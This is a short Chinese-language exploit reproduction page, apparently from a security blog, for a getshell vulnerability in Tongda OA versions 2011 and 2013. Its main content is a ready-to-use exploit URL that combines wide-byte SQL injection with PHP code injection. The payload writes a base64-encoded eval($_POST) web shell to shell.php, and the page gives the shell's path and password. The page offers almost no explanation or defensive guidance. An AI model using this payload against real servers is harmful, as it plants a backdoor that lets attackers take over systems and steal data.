通达oa_2011-2013_通杀GETSHELL

# 通达oa 2011-2013 通杀GETSHELL

=============================

一、漏洞简介
————

二、漏洞影响
————

2011、2013版本

三、复现过程
————

第一步:

http://0-sec.org/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5’%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步:

http://0-sec.org/general/email/index.php

SHELL:

http://0-sec.org/general/email/shell.php 密码C

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容